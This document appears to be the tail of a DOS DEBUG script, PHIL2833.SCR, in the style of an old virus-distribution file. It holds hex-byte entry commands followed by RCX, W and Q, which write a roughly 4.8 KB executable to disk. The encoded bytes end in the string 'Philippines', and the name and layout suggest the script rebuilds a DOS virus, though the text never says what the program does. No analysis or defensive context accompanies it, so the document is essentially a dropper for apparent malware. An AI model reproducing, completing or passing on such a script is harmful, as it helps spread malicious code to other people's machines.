E 1000 50 CF CA D0 38 CF 38 CF 38 CF 38 CF 38 CF 38 CF
E 1010 50 CF CA D0 E0 CF E0 CF 60 CF 60 CF 60 CF 4D CF
E 1020 CA D0 38 CF 38 CF 38 CF 38 CF 38 CF 38 CF D5 CF
E 1030 CA D0 38 CF 38 CF 38 CF 38 CF 38 CF 38 CF CA D0
E 1040 E0 CF E0 CF 60 CF 60 CF 60 CF 4D CF E0 CF E0 CF
E 1050 CA D0 D5 CF 38 CF 38 CF 38 CF 38 CF 50 CF CA D0
E 1060 38 CF 60 CF 60 CF 60 CF 4D CF CA D0 50 CF 38 CF
E 1070 38 CF 38 CF 38 CF D5 CF CA D0 D5 CF 38 CF 38 CF
E 1080 D5 CF CA D0 60 CF 60 CF 60 CF 4D CF CA D0 50 CF
E 1090 38 CF 38 CF 50 CF D4 8C 94 AC 84 54 6C B9 99 CA
E 10A0 B0 2E B9 37 FA 44 92 63 B2 B9 3F BA 21 92 63 8A
E 10B0 B9 CE 39 66 C2 DB 53 FA 26 B9 37 B9 54 92 26 2F
E 10C0 BA 32 3A F2 3D 0F FA 05 3D CA 8F 16 07 15 CA 0D
E 10D0 A8 42 E9 49 29 49 63 D2 15 CA 4D BE 18 51 7F 35
E 10E0 B5 92 05 CD B2 44 74 7C 57 E5 0D D2 CA A8 4A 6D
E 10F0 C2 05 C9 C9 A8 4A BA 3A F2 32 34 3C 04 25 CD B2
E 1100 57 E5 51 18 05 B2 CA 44 3D 4C F2 96 17 11 28 5B
E 1110 D2 8F F6 C2 05 F2 CA 57 E5 3D 3C F2 96 17 C6 F8
E 1120 CD CA 05 82 CA 57 E5 3D 4C F2 96 17 C6 F8 CC C2
E 1130 05 F2 CA 57 E5 8F 0B C2 D6 D8 DA 04 DF 88 05 D2
E 1140 CA 44 3D D9 F2 96 17 11 28 5B D2 8F A4 C2 05 8A
E 1150 CA 57 E5 3D 59 F2 96 17 C6 F8 CD CA 05 F2 CA 57
E 1160 E5 3D CC F2 96 17 C6 F8 CC C2 05 8A CA 57 E5 8F
E 1170 39 C2 D6 D8 DA 04 DF 88 05 D2 CA 44 3D 4B F2 96
E 1180 17 11 28 5B D2 8F 52 C2 05 F2 CA 57 E5 3D 3B F2
E 1190 96 17 C6 F8 CD CA 05 FA CA 57 E5 3D 9E F2 96 17
E 11A0 C6 F8 CC C2 05 F2 CA 57 E5 8F EA C2 D6 D8 DA 04
E 11B0 DF 88 05 D2 CA 44 3D 0E F2 96 17 11 28 5B D2 8F
E 11C0 08 CA 05 E2 CA 57 E5 3D DD F2 96 17 C6 F8 CD CA
E 11D0 05 E2 CA 57 E5 3D AD F2 96 17 C6 F8 CC C2 05 E2
E 11E0 CA 57 E5 8F A0 CA D6 D8 DA 04 DF 88 05 EA CA 44
E 11F0 3D 0F FA 96 17 11 28 5B D2 8F 36 CA 05 F2 CA 57
E 1200 E5 3D FA F2 96 17 C6 F8 CD CA 05 F2 CA 57 E5 3D
E 1210 6A F2 96 17 C6 F8 CC C2 05 F2 CA 57 E5 8F 4E CA
E 1220 D6 D8 DA 04 DF 88 87 18 3F 6D 9C 15 B0 CA A8 C1
E 1230 BA 32 F8 FA 44 92 CA CA 00 FA 21 92 EA 0D C1 61
E 1240 A8 C1 AE FA 24 92 86 3A 14 92 6D E1 1D 7E C2 8F
E 1250 73 27 0D 8A 61 8F 43 27 AE FA 64 92 86 3A 54 92
E 1260 6D E1 1D D0 F2 8F C3 27 BE FA 94 92 FA 32 51 37
E 1270 05 37 33 59 D0 5F BD 09 E2 CF 1F B5 BD 96 78 FA
E 1280 BA F2 8F 27 2F 0D CA 94 15 F0 CA 8F 11 27 F2 6D
E 1290 84 8F 61 27 6D 41 1D B0 CA A8 C1 0C A1 82 CA 4C
E 12A0 3D B5 92 51 37 74 05 50 F2 57 E5 8F DA CA 14 D8
E 12B0 35 E2 CA 77 48 4E DF 27 B4 63 0F D8 CE 2F 21 6B
E 12C0 D2 87 2A 77 B9 86 B9 94 92 25 B7 82 87 8E 17 B9
E 12D0 96 B9 94 92 B9 C6 39 D1 92 0A 0E 6B D2 87 1D 77
E 12E0 26 8F E7 2F 07 64 2E 0C 96 AF 86 FC FA 24 0D DA
E 12F0 CA B8 CA EA 4D B2 9E CF 7F 70 96 10 77 58 A8 C1
E 1300 11 D8 3A FA 2E 51 D0 BE 10 F0 FA EB CA AE FA FA
E 1310 CA D5 EA CA 26 F2 32 D8 96 B9 F4 92 C6 E8 CA C2
E 1320 8F 10 67 8F BF 67 3D 07 CA 8E 6A 3D CA C2 05 FA
E 1330 9A 96 3F AD 59 E0 9D DF 1F 3D A7 CA 1D 02 9A 96
E 1340 3F 45 D2 AD 60 D0 9D 9C 63 07 15 BA CA 54 D2 28
E 1350 35 B1 CA 3D E2 CA B9 86 A1 86 2C 2F 8F 4D 07 8E
E 1360 6C DA 3C 05 0F 9A 96 3F AD 99 00 9D DF 1F BA F2
E 1370 8F BD 07 87 21 07 BA 32 BA F2 4D CA 05 AE CA 1D
E 1380 34 92 96 1F 5F BD 0D 2C 19 B4 09 E4 37 6B F2 09
E 1390 E3 37 6B DA 97 57 96 B7 3D 7D F2 05 9A CA 57 ED
E 13A0 8F 43 7F 5B 1A 3D B1 92 96 27 AD 9D 9A D0 63 1F
E 13B0 0D C2 D4 51 88 8F 42 2F 5B E2 6D C4 8F 9A 2F 87
E 13C0 23 7F AC 83 93 8B C3 C9 BB 83 C9 4C 63 6B B3 93
E 13D0 53 C3 C9 94 C3 73 C3 03 C3 BB C9 53 C3 C9 A4 C3
E 13E0 BB 83 AB C3 A9 C9 50 68 69 6C 69 70 70 69 6E 65
E 13F0 73
RCX
12F1
W
Q
ÄÄ PHIL2833.SCR ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
EoF.
